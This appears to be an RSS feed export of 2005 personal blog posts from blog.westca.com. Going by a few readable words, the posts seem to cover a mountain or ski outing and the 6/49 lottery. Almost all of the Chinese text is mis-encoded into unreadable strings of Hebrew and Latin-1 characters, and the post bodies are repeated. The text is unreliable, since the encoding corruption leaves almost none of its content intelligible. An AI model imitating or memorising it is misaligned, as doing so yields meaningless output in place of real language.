    -׳עֽם־×ֱֹֻת´ז£¬ְ´»״±¼²¨׃כֱ½¸צ±םׁ³¡ֻש£¬³×׳דֱֱֻ½׀¡±¸טַת£¬¸¹²¿¸׀¾ץ׃׀ּ£¬ײ×µְַ׃ֳֶרֻשײֲ£¬־°­£¬ׂ²¼לׁיֱֻ׳װ¼÷£¬¿´ְ´£¬־´ְ´ָח׃׀»ת»ב¿×ׁ³×»ב£¬²»ֲֵ³×²»ֽךָ«³¡¡££÷£©²»¹‎£¬ֶהײ׀ׁ³×ײֱׂ»׳¸טַת£¬ׂע־×»»ֶרּ«ֳֽ£¬±»׳װ¼÷µִ¿ֻ®ֻשַ÷£¬¾ה׳׃³×ְ´¶ֿ¶ֿ׀ר׀ר£¬÷ֳװ÷¿לµקױ£¬»ײ¸´ָח³ץ¡£÷ַ÷ַ£¬²מµדְֲֿם§ַ°ּד¡£
    -
    -½סּל÷ֽׂ¶׳׃½ד¡¢׀ה׳׃װ¼÷ֳָ¥¾ֵ¼ַ£¬ֹּ³¡ַ°ֽ£³µ־»÷ִׁױׂ£¬÷ֳ²»ָׂ׳ױׂµ½ׂ»ֽ£³µ־»£¬׀ה׳׃ױ‎µ¹³µֽש¿ױ־»»½רײ®¼£¬ִֻ¸צ־קַָֻאִך¼³µײ±´³ױ¼ָכ׀ה׳׃־´½רµִ³µ־»£¬ֱמׂ»±µִ׀ה׳׃ֶר·ױ²»ׁׂ£¬´ףֹשֳשµׁ£¬־ִ־£¬־קָֻ־׃£¬»¹ְקֹשײ־׀ה׳׃־×÷־²»װ₪׳קײ¸¾£¬ָ»÷ףׁן³₪¶רָ¥¡£ֻ­ֻµ־קָֻµִֻ״ײ¸£¬ױג¾ַֽ°סׁש÷ֽ´ת±םֱֻ¡£
    -
    -¥µ®µִׂפְײֻז´¦¿ֹ־ֵ£¬ֳ¦ֲµµִ½ָױ£¬׃׀ֳָֻ¦׳ֵ¿×party£¬׃׀ֳָֻ¦׳ֵ¹÷־ן£¬׃׀ֳָֻ¦׳ֲֳֵ׃־¡£¡£¡£¡£־ׂ£¬ֳ¦׳ֵֹת»מ£¬µ±ָ»£¬ֹת»מַ׀ֱ¿אµִ£¬׀ֱ¿אׂ²ײ₪ֳק׳װ¼÷»¹»מ׳ֵ£¬²»¹‎£¬׀ֱ¿אµִֽ¬±ׂ²²»»ב¿ק´‎׳װ¼÷£¬¸ֳ׃יְײµִ±÷ע׳װָ»²»»בְ­ֲֿ¡£ֻהָ»ֳ¦ֲµ´ת±ם׳װ¼÷µִ־ִ£¬ֽ¬ׁש£¬ׂ²´ת±םֱֻ׳װ¼÷µִ׃׀ִ£¬±חײ₪ַ°ֹ£¬ֿכָ¥°ֹ¡£
    -
    -ּשׂ»ױֵָ¥ֹ½¶¥ִֵµִױױֶ¬£¬´ֵֻ®µ¯ּר¼«÷ֳ£¬ַא³צ׃ְ¶£¬÷ַ÷ַ¡£

    => ¸¶אִָ£¡

    ]]>
    -
    - - ׃ײֹֹֿ½ֱֻ - http://blog.westca.com/blog_wencheng/p_full/49928.html - 2005-12-09T07:46:39Z - ־ֲ³ַ - ׀ִַיװ‎¼ַ - ׃ײֹֹֿ½ֱֻ£¬µ±ָ»²»ַ´ע׃־»ק£¬־ָ¡ָ¥ִך»¬ׁ©µִ½ּׁµ£¬³ֻ׳ֵ׳װ¼÷µִׂ»µד¿ױֿ׀±¼ה£¬׳¥½פ±»ת£¬¶א»¬¶אֱ·¡£ - -ׂ» ־ׂ±¿»¹ֳַַֻ±¿ - -µ½ֱֹֻ½¶¥£¬³µ²»¶א£¬µׂ»¸צֽ£³µ³¡¾׃ָ»»¹¿ױ²»ֹ³µ־»£¬÷ֽײָױµִָ‎¸צֽ£³µ³¡ֲָת³µµִ¾°ֿףוִָ»²»ֽ¬£¬ֻשׂװ£¬־ׂ׳װָ»²»׀טׂ×hikingµ½׳גֶק׀µµִµ״·½ֱֻ¡£ - -ּמ±םµִ±÷עׂ²ײ»׃׀־ׂׂ»ָֻ£¬ֻ³ְµִ÷£¬ֳִׁ©׀¬µִ±÷ע־ׂ־ֱֻׂ»ֹש¹₪׳קָֻװ±־ײֳ´ֳ¿´־־ׂ´©׀¬׳׃׀¡ָֽ¶¼ְױµִ÷ּ£¬ֻ‎ֱ¢ֲם´׃¹סּ¨±ֳִ³צׂ»¸צּתָ¦׳׃£¬ָחֿנֶ₪½מ´ף׀¡£¬ֻµֽש׀¬׳׃µִ±װµ´ר׳׃ֹֿׂ»ּ׳¾ֽ¿ֹׂװ¼׃¿ם׀¬׳׃µִֹֻ½פ¶ֱָֻ¡£־ׂ»׀ָ»´ף־ע£¬װ­ְ´׃׀ױגֳ´ׂ»¸צֽג¼׃¹¦ִ£¬ׂװֽש¶¼װ¹־ׂ׳לְֱ£¬׳װ¼÷ׂ²ֳ»׃׀ֿכµ½¿ֹׂװ׃׀ױג¸צ·½·¨¿ֹׂװ½ג¾צ־ּג£¬ֳָ־ׂµִ׀¡ָֽ¾¡ֱֻױִ¥÷ֽ¿אִׁ¡£°¦£¬װ¹־ׂ±¿°¡¡£ - -¿ֹ½׃׳ְֲֵֿ´¸±¿µִָֻ³צֿײֱֻ£¬ִַ¸צ°׳ָֻ׀¡½ד¹₪׳קָֻװ±ֳִ׳ִֵַ¸צּתָ¦׳׃£¬׳ף׃ׂ°ֵ×ֱֻ°כּלׂ²־·¨°ּׁתָ¦ּ׳װ׀¬׳׃ֹֿ£¬ֻ‎÷°¹‎ְ´ֱםֽגׂ»¸צ°׳ָֻ׀¡»ן׳׃£¬ׂ»ׁש־¹¦¶ר·µ£¬׃ײְ´ֱֻׂ»¸צָ¾׳ֵ»ֳֶ«µִַׁײ¹₪׳קָֻװ±£¬ׂ»ׁשֳ»׃׀°ּׁתָ¦ּ׳ֹֿ¡£־ׂ¼±ֱֻ£¬ֳִ¹‎ּתָ¦׃ֳ׳װ¼÷µִֿכֿףֱ¦¼עµ¥¾ּֽ׳³ֹ¹¦£¬ֶהµµְְם¾ָֽחֽ¬°ֱׁ½¸צװ²µִֿנֶ₪½מּ׳ֶנְ´µְְםׂ»ׁש£¬¿ֹױגֳ´¼עµ¥µִ¶«־ק־ײֳ´ױג¼¸¸צָֻ¶¼²»»ב£¬¶רַׂ׳ף׃ּׂ׳¹‎ְ´ּ׳¹‎ָ¥ׂ²²»µֳֶה·¨¡£¿´ְ´£¬°׳ָֻµִִװ׳׃׃׀±÷עױזµִַ²»¹ױֽהµִ¡£ֻשׂװ£¬»¹ֳַַֻ±¿¡£ֱֱֻ£¬ָ‎ָֻׂ»ֶנװֳָ־ׂ¾·¶ֱםׂ»ײ»׀¬׳׃µִּ׳ָ¦·½·¨£¬ֻµֱֻ¾ה£¬»¹ִַד׳¨ׂµ¡£ - -¶‏ »ְֻ־ֱֻׂ - -³צֳֵַ°±¾ֿכ´רֿא»תֹֹֿ½µִ£¬ֶֿ¿×´°ֱ±¿´¿´ּל£¬ׂץװֳֶ²¼£¬ֿכֿכױגׁשµִּלִֵ²»³צ÷ֳ¶«¶«£¬׃ִַמֽ··ֲֵֿ¡£ - -ֱֲֻֿ¸ֻ£¬ֱֹֹֻֿ½µְ£¬װֶ־ם½¥¿×£¬ְ¶ּלֲ¶³צְ´£¬µ½ֱֹֻ½¶¥£¬¾׃ָ»ׁפ¹ג²׃ְֳ£¬ְ¶ּלְן£¬°׳װֶ±»·ח´µµִָחֻ¿°דַ§׀ץֽעֲֶ£¬ְֳ¼«ֱֻ¡£´ֻ±£¬־ׂ»ְֱֻֻ¡£ - -¸»µִַֻז׳ֵ־ׂ³ֻ׳רְֲ³µ¸¶ָµִ½¥ֹ‎£¬ױ¸צBowenµ÷ֿװֲ¶³צְ´£¬µ÷µֲִֿ²¿ְָׂ»ַװֶ²ד£¬µ÷µִֹ½¶¥ַו־ת¿ֹ¼£¬÷£ֽוְןׂ²¿ֹ¼¶ֲֹײµִ¹‎ֽש£¬־ָׂחֽ¬ױ¾װװֶײ®ֹֿ¡¢ּלײ®ֲֿ¡£ֿא»ת£¬ֿא»ת£¬־ׂ»°¡¡£ - -½°רֽםµִ±÷ע£¬ּ«ׁפױױװװ¶´¦µִbakerֹ½£¬ֹ½µִ°כֹ½ׁװֶ־םחװֶָ£¬ֹ½µִ¶¥¶ֻ±»ֿ¦ׁפױױµִֽ¨÷ל£¬±³¾°³‎ֱֻ¸װ¶´¦µְִ¼ּל£¬ֹװ½µדµִµ״·½³ֿײµִַ·ֹ«£¬ִַׁשµְֳִ¾°¶¼ֳָ־ׂ¼¸÷ץֹµׁ£¬ֻµ¾°ֹ«ֱמָֻײֿֿ¢ׂ²²»־×¹‎¡£ֿא»ת£¬ֿא»ת£¬־ׂ»°¡¡£ - -ָ‎ ִ°ָֻ - -־ׁׂ¡װסµִ¿־³ֲַּֿ־חׂ»µד°כ£¬´ַֻ°׳ק־×ָָֹם£¬־ָֿׂ׳װ¼÷³ְֲֻ³µ»מ¶¯»מ¶¯¡£ - -ֵ¼ָ»»ת»ב÷ֽׂ»°׳ָֻ־ו®ְ´ֻךµִ»¬ױֽ¬³ֻׂ»׳ש£¬ֱֹֻֿ׳שֻ±ד¿×¼־־ׂ־×÷־ִד²»´רֽ·¿ר¡£¿×¼±£¬־ֳׂ»׃׀ֳק°׳ֽ·¿רµִ׃¢־ִ£¬ֻײ¸ײ¸׳װ¼÷µִֽ·£¬־ֳׂק°׳ֱֻ£¬ֻµ£¬÷ֳֿס²»׀טׂס£ֻֻµ£¬ִד׀טׂ׸צֽ·¿ר¡£־ֻׂµ£¬־ׂ»בֲ‎ֲ‎»¬£¬׀¡׀ִ׳װ¼÷²»»בֻ₪ץ׃¡£ָ»÷ף¾ֽ¶«ׂ»¾ה־קׂ»¾הµִ־ֻ»¬ׁ©µִֻ®ֶ½£¬²»ׂ»»ב£¬ֻ׃ײֶָ»״ְ´ֻµ£¬ִד׀טׂ×ֽ·¿ר¡£°¦£¬ױ¸צׂ»ֿיֱײֹ©¡£ - -ֽ»ָ»¼ה£¬־ֳׂק°׳ֱֻ£¬־ׂ¿´µ½ֻ´רµִֽ·¿ר÷ףִװֹ׳²¿־»׃׀ׂ»´יׁ©»¹ױ´װֻ´רµֳִֹֿז£¬׃ַ£¬־ׂ־£¬ַ²»ִַד¸ױֻ₪¹‎£¬ֻֻµַµִ£¬ָ»÷ף£¬ֻ׃ײְ´ֱֻׂ»¾ה£¬ִד׃¦¸ֳ´רֽ·¿ר¡£¹‏¹‏¡£־ֻׂדַ·‏ֱֱֻֻֻ¡£־ׂ־ֻֻ₪ץ׃ַװְ¼µְֹֿ»¹ֲַּµְֹֿ£¬ֻֻµ£¬ֻ¸רֻ₪µִִװ׳׃¼ַ²»ֶנֲַיְ´ֱֻ£¬²»ײ×µְַ²ֳ´µְ¡£°¦£¬ױ¸צׂ»ֶזָֻ¡£ - -ְֱֲֲֻֿ³µ£¬¾ֽ¼ֻ³ו½רֱֲֻּµְ¡£ - -ִֻ ½ֱּ· - -²»ײ×µְַ½סָױָֻּ«ֹ£¬»¹ַ´ף»ןֻ®ֶ½¶¼ּ«¸£¬µ½ֱֻׂ»µד°כ£¬µָ´‎ֹֿ¿־µִײ»׃׀־ׂׂ»ָֻ¡£׃ַ£¬ְ´ֱֻׂ»¹₪׳קָֻװ±ֻµׂ»»ב»ב¸ר־ֵֹׂׂ»¸צ´׃µֲ¹תֳֶׂסְ´µִ½ֱּ·£¬ֻ®ֶ½÷¸£¬ׂע־×ײ»׃׀־ׂׂ»ָֻ£¬ֻשׂװ½סּלֻדַֻ½ָֻ½ּׁ§ֱֻ£¬µ«±¼ה²»»בֿסֽש³£ֹֿ¿־ֱ½׀¡±£¬ײ»ֹֿׂ»׀¡±¡£־ֻׂµ£¬ֳ»־ּג¡£µ±ָ»ֱֻ£¬־ְׂײµֳױֱֻׂ¸צ²»»¨ַ®µִׂ»¶װׂ»µִֻ½ָֻ½ֱּ·ֱֻ¡£ - -½ֱּ·ְ´ֱֻ£¬ַ־»³₪׳ֵ£¬¹ְֳ‏׳ֵ׃׀־וֱש®ֻך£¬ֹםּו÷׃²ְ£¬ׂ²÷½¡ּ¸£¬¿ֹֿ§£¬ֹֿ¿־±ֻֻµµִ÷¶א׃׀¹״»¬ׁ©µִ׳¨ׂµץ׃ן¶װ־ְׂ´ֻµ¶¼ּ‎²»ֳק°׳£¬÷ֳװ»¬ׁ©µִ׀ם¶א¶¯׳קׂ»¿´¾ֽײ×µְ£¬¶רַׂ´ף¶אµִ׃ןׁװ־ׂ»¹ַּ‎ֳק°׳£¬ֻ¾ְױ‎־ׂµִ¶¯׳ק±־ׂׂ²ּ‎µֳִק°׳£¬ַׂ÷ףְ´ֻ¶¼׃ֳ½׳א¡¢÷ֽ׀³µָׂפְײץ׃ן÷ֽ־ׂ½»ּ¸£¬ׂע־׳ְֲֻ³µֿ׀ֱִ±ֻײ×µְֱֻ־ׂµִ¹₪׳ק׀װײ¡£ - -±¼ה¹‎µִ÷¿ל£¬µָֻ÷ֽ־ׂ¸ז±נ£¬־ׂ¿´ֱֻׂ»ֲֿ±¼ה£¬ֻ¸ר־ֱֹֻֿׂ׳ד׳דׂ»¸צ°כ׀¡±£¬÷÷£¬ֱ׳±ֻ»¹²»ֽ¿ה־ַׂ¸צ÷°פµִׁ§ֹת£¨׃¦¸ֳַ¿ֶֽר»°°ֹ£©£¬²»¹‎£¬÷ֳ´ץֻײ×µְֶש½ס־×ײ¹־ׂײ»»¬¹‎°ֻ¾ֵ´־¾ֽ¿ֹׂװָח´ֻֻ®ֶ½£¬¶אֹֻד׃׀ֱל־עֱ¦µִ°ֹ¡££¨׳װ¿ה£© - -׀¡½ב£÷½סּלµִׁ©¿צ²»÷ֳ£¬÷ֽײָױָֹֻםµִׁ©±ָ½ֶֿנְ´£¬׀ם¶אµ״·½¶¼׃׀±ש£¬÷ֳ¼¸´־¶¼װ±שֹֿ²מµדֻ₪µ¹£¬׃ֶָהַׁפ¹גֲֿµִµ״·½־×ֹץ¡£ָח¹½¼¸ָױּלֶרװ₪±¨ֹ½ֹֿ²»װ׃׀ׁ©£¬¹ְ¼ֶײָױ»¬ֶנְ´¾ֽ³ֹ־ּגֱֻ¡£²»¹‎£¬ָח¹ּלַח£¬²»ֲֿׁ©£¬ײָױ¾ֽ²»»¬ׁ©ֱֻ£¬ְֵֹ½ָ¥א¶¡£ - - - - - -
    -ׂ» ־ׂ±¿»¹ֳַַֻ±¿
    -
    -µ½ֱֹֻ½¶¥£¬³µ²»¶א£¬µׂ»¸צֽ£³µ³¡¾׃ָ»»¹¿ױ²»ֹ³µ־»£¬÷ֽײָױµִָ‎¸צֽ£³µ³¡ֲָת³µµִ¾°ֿףוִָ»²»ֽ¬£¬ֻשׂװ£¬־ׂ׳װָ»²»׀טׂ×hikingµ½׳גֶק׀µµִµ״·½ֱֻ¡£
    -
    -ּמ±םµִ±÷עׂ²ײ»׃׀־ׂׂ»ָֻ£¬ֻ³ְµִ÷£¬ֳִׁ©׀¬µִ±÷ע־ׂ־ֱֻׂ»ֹש¹₪׳קָֻװ±־ײֳ´ֳ¿´־־ׂ´©׀¬׳׃׀¡ָֽ¶¼ְױµִ÷ּ£¬ֻ‎ֱ¢ֲם´׃¹סּ¨±ֳִ³צׂ»¸צּתָ¦׳׃£¬ָחֿנֶ₪½מ´ף׀¡£¬ֻµֽש׀¬׳׃µִ±װµ´ר׳׃ֹֿׂ»ּ׳¾ֽ¿ֹׂװ¼׃¿ם׀¬׳׃µִֹֻ½פ¶ֱָֻ¡£־ׂ»׀ָ»´ף־ע£¬װ­ְ´׃׀ױגֳ´ׂ»¸צֽג¼׃¹¦ִ£¬ׂװֽש¶¼װ¹־ׂ׳לְֱ£¬׳װ¼÷ׂ²ֳ»׃׀ֿכµ½¿ֹׂװ׃׀ױג¸צ·½·¨¿ֹׂװ½ג¾צ־ּג£¬ֳָ־ׂµִ׀¡ָֽ¾¡ֱֻױִ¥÷ֽ¿אִׁ¡£°¦£¬װ¹־ׂ±¿°¡¡£
    -
    -¿ֹ½׃׳ְֲֵֿ´¸±¿µִָֻ³צֿײֱֻ£¬ִַ¸צ°׳ָֻ׀¡½ד¹₪׳קָֻװ±ֳִ׳ִֵַ¸צּתָ¦׳׃£¬׳ף׃ׂ°ֵ×ֱֻ°כּלׂ²־·¨°ּׁתָ¦ּ׳װ׀¬׳׃ֹֿ£¬ֻ‎÷°¹‎ְ´ֱםֽגׂ»¸צ°׳ָֻ׀¡»ן׳׃£¬ׂ»ׁש־¹¦¶ר·µ£¬׃ײְ´ֱֻׂ»¸צָ¾׳ֵ»ֳֶ«µִַׁײ¹₪׳קָֻװ±£¬ׂ»ׁשֳ»׃׀°ּׁתָ¦ּ׳ֹֿ¡£־ׂ¼±ֱֻ£¬ֳִ¹‎ּתָ¦׃ֳ׳װ¼÷µִֿכֿףֱ¦¼עµ¥¾ּֽ׳³ֹ¹¦£¬ֶהµµְְם¾ָֽחֽ¬°ֱׁ½¸צװ²µִֿנֶ₪½מּ׳ֶנְ´µְְםׂ»ׁש£¬¿ֹױגֳ´¼עµ¥µִ¶«־ק־ײֳ´ױג¼¸¸צָֻ¶¼²»»ב£¬¶רַׂ׳ף׃ּׂ׳¹‎ְ´ּ׳¹‎ָ¥ׂ²²»µֳֶה·¨¡£¿´ְ´£¬°׳ָֻµִִװ׳׃׃׀±÷עױזµִַ²»¹ױֽהµִ¡£ֻשׂװ£¬»¹ֳַַֻ±¿¡£ֱֱֻ£¬ָ‎ָֻׂ»ֶנװֳָ־ׂ¾·¶ֱםׂ»ײ»׀¬׳׃µִּ׳ָ¦·½·¨£¬ֻµֱֻ¾ה£¬»¹ִַד׳¨ׂµ¡£
    -
    -¶‏ »ְֻ־ֱֻׂ
    -
    -³צֳֵַ°±¾ֿכ´רֿא»תֹֹֿ½µִ£¬ֶֿ¿×´°ֱ±¿´¿´ּל£¬ׂץװֳֶ²¼£¬ֿכֿכױגׁשµִּלִֵ²»³צ÷ֳ¶«¶«£¬׃ִַמֽ··ֲֵֿ¡£
    -
    -ֱֲֻֿ¸ֻ£¬ֱֹֹֻֿ½µְ£¬װֶ־ם½¥¿×£¬ְ¶ּלֲ¶³צְ´£¬µ½ֱֹֻ½¶¥£¬¾׃ָ»ׁפ¹ג²׃ְֳ£¬ְ¶ּלְן£¬°׳װֶ±»·ח´µµִָחֻ¿°דַ§׀ץֽעֲֶ£¬ְֳ¼«ֱֻ¡£´ֻ±£¬־ׂ»ְֱֻֻ¡£
    -
    -¸»µִַֻז׳ֵ־ׂ³ֻ׳רְֲ³µ¸¶ָµִ½¥ֹ‎£¬ױ¸צBowenµ÷ֿװֲ¶³צְ´£¬µ÷µֲִֿ²¿ְָׂ»ַװֶ²ד£¬µ÷µִֹ½¶¥ַו־ת¿ֹ¼£¬÷£ֽוְןׂ²¿ֹ¼¶ֲֹײµִ¹‎ֽש£¬־ָׂחֽ¬ױ¾װװֶײ®ֹֿ¡¢ּלײ®ֲֿ¡£ֿא»ת£¬ֿא»ת£¬־ׂ»°¡¡£
    -
    -½°רֽםµִ±÷ע£¬ּ«ׁפױױװװ¶´¦µִbakerֹ½£¬ֹ½µִ°כֹ½ׁװֶ־םחװֶָ£¬ֹ½µִ¶¥¶ֻ±»ֿ¦ׁפױױµִֽ¨÷ל£¬±³¾°³‎ֱֻ¸װ¶´¦µְִ¼ּל£¬ֹװ½µדµִµ״·½³ֿײµִַ·ֹ«£¬ִַׁשµְֳִ¾°¶¼ֳָ־ׂ¼¸÷ץֹµׁ£¬ֻµ¾°ֹ«ֱמָֻײֿֿ¢ׂ²²»־×¹‎¡£ֿא»ת£¬ֿא»ת£¬־ׂ»°¡¡£
    -
    -ָ‎ ִ°ָֻ
    -
    -־ׁׂ¡װסµִ¿־³ֲַּֿ־חׂ»µד°כ£¬´ַֻ°׳ק־×ָָֹם£¬־ָֿׂ׳װ¼÷³ְֲֻ³µ»מ¶¯»מ¶¯¡£
    -
    -ֵ¼ָ»»ת»ב÷ֽׂ»°׳ָֻ־ו®ְ´ֻךµִ»¬ױֽ¬³ֻׂ»׳ש£¬ֱֹֻֿ׳שֻ±ד¿×¼־־ׂ־×÷־ִד²»´רֽ·¿ר¡£¿×¼±£¬־ֳׂ»׃׀ֳק°׳ֽ·¿רµִ׃¢־ִ£¬ֻײ¸ײ¸׳װ¼÷µִֽ·£¬־ֳׂק°׳ֱֻ£¬ֻµ£¬÷ֳֿס²»׀טׂס£ֻֻµ£¬ִד׀טׂ׸צֽ·¿ר¡£־ֻׂµ£¬־ׂ»בֲ‎ֲ‎»¬£¬׀¡׀ִ׳װ¼÷²»»בֻ₪ץ׃¡£ָ»÷ף¾ֽ¶«ׂ»¾ה־קׂ»¾הµִ־ֻ»¬ׁ©µִֻ®ֶ½£¬²»ׂ»»ב£¬ֻ׃ײֶָ»״ְ´ֻµ£¬ִד׀טׂ×ֽ·¿ר¡£°¦£¬ױ¸צׂ»ֿיֱײֹ©¡£
    -
    -ֽ»ָ»¼ה£¬־ֳׂק°׳ֱֻ£¬־ׂ¿´µ½ֻ´רµִֽ·¿ר÷ףִװֹ׳²¿־»׃׀ׂ»´יׁ©»¹ױ´װֻ´רµֳִֹֿז£¬׃ַ£¬־ׂ־£¬ַ²»ִַד¸ױֻ₪¹‎£¬ֻֻµַµִ£¬ָ»÷ף£¬ֻ׃ײְ´ֱֻׂ»¾ה£¬ִד׃¦¸ֳ´רֽ·¿ר¡£¹‏¹‏¡£־ֻׂדַ·‏ֱֱֻֻֻ¡£־ׂ־ֻֻ₪ץ׃ַװְ¼µְֹֿ»¹ֲַּµְֹֿ£¬ֻֻµ£¬ֻ¸רֻ₪µִִװ׳׃¼ַ²»ֶנֲַיְ´ֱֻ£¬²»ײ×µְַ²ֳ´µְ¡£°¦£¬ױ¸צׂ»ֶזָֻ¡£
    -
    -ְֱֲֲֻֿ³µ£¬¾ֽ¼ֻ³ו½רֱֲֻּµְ¡£
    -
    -ִֻ ½ֱּ·
    -
    -²»ײ×µְַ½סָױָֻּ«ֹ£¬»¹ַ´ף»ןֻ®ֶ½¶¼ּ«¸£¬µ½ֱֻׂ»µד°כ£¬µָ´‎ֹֿ¿־µִײ»׃׀־ׂׂ»ָֻ¡£׃ַ£¬ְ´ֱֻׂ»¹₪׳קָֻװ±ֻµׂ»»ב»ב¸ר־ֵֹׂׂ»¸צ´׃µֲ¹תֳֶׂסְ´µִ½ֱּ·£¬ֻ®ֶ½÷¸£¬ׂע־×ײ»׃׀־ׂׂ»ָֻ£¬ֻשׂװ½סּלֻדַֻ½ָֻ½ּׁ§ֱֻ£¬µ«±¼ה²»»בֿסֽש³£ֹֿ¿־ֱ½׀¡±£¬ײ»ֹֿׂ»׀¡±¡£־ֻׂµ£¬ֳ»־ּג¡£µ±ָ»ֱֻ£¬־ְׂײµֳױֱֻׂ¸צ²»»¨ַ®µִׂ»¶װׂ»µִֻ½ָֻ½ֱּ·ֱֻ¡£
    -
    -½ֱּ·ְ´ֱֻ£¬ַ־»³₪׳ֵ£¬¹ְֳ‏׳ֵ׃׀־וֱש®ֻך£¬ֹםּו÷׃²ְ£¬ׂ²÷½¡ּ¸£¬¿ֹֿ§£¬ֹֿ¿־±ֻֻµµִ÷¶א׃׀¹״»¬ׁ©µִ׳¨ׂµץ׃ן¶װ־ְׂ´ֻµ¶¼ּ‎²»ֳק°׳£¬÷ֳװ»¬ׁ©µִ׀ם¶א¶¯׳קׂ»¿´¾ֽײ×µְ£¬¶רַׂ´ף¶אµִ׃ןׁװ־ׂ»¹ַּ‎ֳק°׳£¬ֻ¾ְױ‎־ׂµִ¶¯׳ק±־ׂׂ²ּ‎µֳִק°׳£¬ַׂ÷ףְ´ֻ¶¼׃ֳ½׳א¡¢÷ֽ׀³µָׂפְײץ׃ן÷ֽ־ׂ½»ּ¸£¬ׂע־׳ְֲֻ³µֿ׀ֱִ±ֻײ×µְֱֻ־ׂµִ¹₪׳ק׀װײ¡£
    -
    -±¼ה¹‎µִ÷¿ל£¬µָֻ÷ֽ־ׂ¸ז±נ£¬־ׂ¿´ֱֻׂ»ֲֿ±¼ה£¬ֻ¸ר־ֱֹֻֿׂ׳ד׳דׂ»¸צ°כ׀¡±£¬÷÷£¬ֱ׳±ֻ»¹²»ֽ¿ה־ַׂ¸צ÷°פµִׁ§ֹת£¨׃¦¸ֳַ¿ֶֽר»°°ֹ£©£¬²»¹‎£¬÷ֳ´ץֻײ×µְֶש½ס־×ײ¹־ׂײ»»¬¹‎°ֻ¾ֵ´־¾ֽ¿ֹׂװָח´ֻֻ®ֶ½£¬¶אֹֻד׃׀ֱל־עֱ¦µִ°ֹ¡££¨׳װ¿ה£©
    -
    -׀¡½ב£÷½סּלµִׁ©¿צ²»÷ֳ£¬÷ֽײָױָֹֻםµִׁ©±ָ½ֶֿנְ´£¬׀ם¶אµ״·½¶¼׃׀±ש£¬÷ֳ¼¸´־¶¼װ±שֹֿ²מµדֻ₪µ¹£¬׃ֶָהַׁפ¹גֲֿµִµ״·½־×ֹץ¡£ָח¹½¼¸ָױּלֶרװ₪±¨ֹ½ֹֿ²»װ׃׀ׁ©£¬¹ְ¼ֶײָױ»¬ֶנְ´¾ֽ³ֹ־ּגֱֻ¡£²»¹‎£¬ָח¹ּלַח£¬²»ֲֿׁ©£¬ײָױ¾ֽ²»»¬ׁ©ֱֻ£¬ְֵֹ½ָ¥א¶¡£
    -
    -
    -
    -]]>
    -
    - - ·¢²ֳֶ־ - http://blog.westca.com/blog_wencheng/p_full/49723.html - 2005-12-07T06:31:13Z - ־ֲ³ַ - ׀ִַיװ‎¼ַ - ÷ֲֹע649£¨²»ַ´׃ְ´ֳ»׃׀£©£¬ׂ»ײ±ׂװְ´¾ָֽֿ־×ײ׀½±÷ֽ־ׂ־װµ£¬ׂ²²»ַ°®ֳ°ֿױײ®ָֻ£¨ְֵֹ½»¹ֽ¦°®ֳ°ֿױ£©£¬ֻשׂװ£¬²»¹²ֶ±µִ½±½נל­¸µ½÷־µָµִ·ט¿סׂ²÷ֹ¶¯׀ִ£¨²»ַ²»¶¯׀ִ£©£¬־ֿׂכ£¬ֲע®´־²»ײ׀½±£¬ָ‎®װ׿ֹׂװ¹»׳װ¼÷³צָ¥FBׂ»¶ֱֻ¡£ -¼¸ּלַ°£¬÷ֵֽף׃ָׁ¥´ףֽ³»×ֲע¶«־ק£¬³צְ´µִ±÷ע²»ײ×µְִִ¸ש½מ¶¯ֱֻׂ»ֲֿ£¬ֿכֶנֲע649ֱֻ£¬׃ַ£¬ֳִֶנ±ָֿױזµִֽ¿ֱֻ¼¸ֲֿ£¬ֿכֱֻ¼¸¸צּ״±נׂגֻ¼µִ‎׳ײ£¬ײמָחµµ÷ֳֳֳֳֽ÷¢׳׃µִִך¼ֽ£¬־ֹֿׂ´ףׁ§µִִך¼ֽ£¬¿×¼¹₪׳קµִִך¼ֽׂװ¼°½סִך׳װ¼÷µִִך¼ֽ£¬·´ױ‎ׁ¡µִ‎׳ײ¶¼÷ִֽך¼¶ל­ֱֹֻֿ£¬ָ»÷ףָ‎¿יַ®ֲעֶ±ֽךֲ¡£½סּל׃ײָ¥´ףֽ³»×ֲע¶«־ק£¬ֿכֶנְ´¶װׂ»ֲֿ½±£¬»תֶקֻµײ׀½±ֱֻ£¬ׂװ־ׂ¹‎ֽשµִ¾­ׁי£¬־ׂ²ֲ׃¦¸ֳַ®װ×ײ®ְאµִ׀¡½±£¬µָ°ׁ²ֶ±¸ר¹₪׳קָֻװ±ׂ»¶װ£¬÷÷£¬ֱש®°ֻװ×£¬ׂ²²»ײ×ַ¼¸µָ£¬·´ױ‎ײ׀ֱֻ²»´ףµִׂ»¸צ׀¡½±£¬׃ײ¹»׳װ¼÷³װ¼¸ּלµֱִֻ¡£ -ֿכֱֻֿכ£¬´׃ֲע²ֶ±ײֱ½ס²מ²»¶אֽ¶ָכµִ׳‎²»»ב³¬¹‎¶‏®װ×£¬ױגֳ´ֻדְ´׳װ¼÷¶אֹ»¹ַ׃׀µד׀¡װֶֻרµִ£¬ױג´־µִ׀¡½±°ׁ־ׂ¹÷ֲע²ֶ±µִ׃ֽ¹´ֶנְ´ֱֻ£¬ׂװ÷ף׃¦¸ֳ»¹»בָ¥ֵ¼¶³¢װׂ»ֲֿ£¬²»¹‎£¬ׂװ־ׂµִ¸צ׀װ£¬¹ְ¼ֶַָ‎ּל´ע׃ד־וּלֹ¹ֽר£¬²»ֲע¶א¹‎׃ֲע£¬µ«ֵ¼¶ֵצֵצװֶֻר£¬ׂ²ְײָ₪¶א¶א¡£ -ֿ£ֲֽֿ»״¿ֹׂװׂ»¾ײ׀µִ£¬׳װ¼÷²»׃ֳױגֳ´ֵ¬ֱ¦׀ֱ¿א·¶·µִ¹₪׳קֱֻ£¬²»¹‎£¬ױגׁשµִֿ£ֽ׃־ְׂ´ֻµ־ׂל׃ּל·½ׂ¹ּ·£¬ױגֳ־²»׳קׂ²°ױ¡£ - ÷ֲֹע649£¨²»ַ´׃ְ´ֳ»׃׀£©£¬ׂ»ײ±ׂװְ´¾ָֽֿ־×ײ׀½±÷ֽ־ׂ־װµ£¬ׂ²²»ַ°®ֳ°ֿױײ®ָֻ£¨ְֵֹ½»¹ֽ¦°®ֳ°ֿױ£©£¬ֻשׂװ£¬²»¹²ֶ±µִ½±½נל­¸µ½÷־µָµִ·ט¿סׂ²÷ֹ¶¯׀ִ£¨²»ַ²»¶¯׀ִ£©£¬־ֿׂכ£¬ֲע®´־²»ײ׀½±£¬ָ‎®װ׿ֹׂװ¹»׳װ¼÷³צָ¥FBׂ»¶ֱֻ¡£

    -

